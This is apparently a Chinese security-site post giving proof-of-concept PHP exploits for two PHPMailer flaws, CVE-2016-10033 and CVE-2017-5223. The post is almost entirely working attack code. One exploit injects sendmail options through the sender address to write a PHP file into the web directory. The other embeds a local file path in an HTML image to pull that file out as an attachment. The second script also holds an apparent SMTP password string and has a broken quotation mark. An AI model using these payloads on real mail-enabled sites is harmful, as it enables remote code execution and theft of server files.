PHPMailer 命令执行任意文件读取漏洞利用【含POC】

时间：2018-02-23 12:35:26人气：次作者：本站作者我要评论

PHPMailer 命令执行漏洞(CVE-2016-10033)

漏洞编号：CVE-2016-10033

影响版本：PHPMailer< 5.2.18

漏洞级别：高危

漏洞POC：

<?php /* 
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) 
A simple PoC (working on Sendmail MTA) 
It will inject the following parameters to sendmail command: 
Arg no. 0 == [/usr/sbin/sendmail] 
Arg no. 1 == [-t] 
Arg no. 2 == [-i] 
Arg no. 3 == [-fattacker\] 
Arg no. 4 == [-oQ/tmp/] 
Arg no. 5 == [-X/var/www/cache/phpcode.php] 
Arg no. 6 == [some"@email.com] 
which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
The resulting file will contain the payload passed in the body of the msg: 
<<< --b1_cb4566aa51be9f090d9419163e492306 
<<< Content-Type: text/html; charset=us-ascii 
<<< 
<<< <?php phpinfo(); ?> 09607 <<< 
<<< 
<<< 
<<< --b1_cb4566aa51be9f090d9419163e492306-- 
See the full advisory URL for details. 
*/ // Attacker's input coming from untrusted source such as $_GET , $_POST etc.  // For example from a Contact form  $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
$msg_body  = "<?php phpinfo(); ?>"; // ------------------  // mail() param injection via the vulnerability in PHPMailer  require_once('class.phpmailer.php'); 
$mail = new PHPMailer(); // defaults to using php "mail()"  $mail->SetFrom($email_from, 'Client Name'); 
$address = "customer_feedback@company-X.com"; 
$mail->AddAddress($address, "Some User"); 
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
$mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; 
} else { echo "Message sent!\n"; 
}

PHPMailer任意文件读取漏洞分析（CVE-2017-5223）

漏洞编号： CVE-2017-5223

影响版本： PHPMailer <= 5.2.21

漏洞级别：高危

漏洞POC：

<?php 
#Author:Yxlink
 
require_once('PHPMailerAutoload.php');
$mail = new PHPMailer();
$mail->isSMTP();
$mail->Host = 'smtp.qq.com';
$mail->Port = 465;
$mail->SMTPAuth = true;
$mail->Username = xxxx@qq.com';  //qq邮箱
$mail->Password = 'zsuhxbmsaioxbcgb';//申请配置邮件客户端获取到的16位密码和qq密码不一样
$mail->SMTPSecure = 'ssl';
 
 
$mail->CharSet  = "UTF-8";
$mail->Encoding = "base64";
  
$mail->Subject = "hello";
$mail->From = "xxxx@qq.com"; 
$mail->FromName = "test"; 
  
$address = "xxxx@qq.com";
$mail->AddAddress($address, "test");
  
$mail->AddAttachment('test.txt','test.txt');
$mail->IsHTML(true); 
$msg="<img src='D:\\1.txt'>test";
$mail->msgHTML($msg);
  
if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!";
}
?>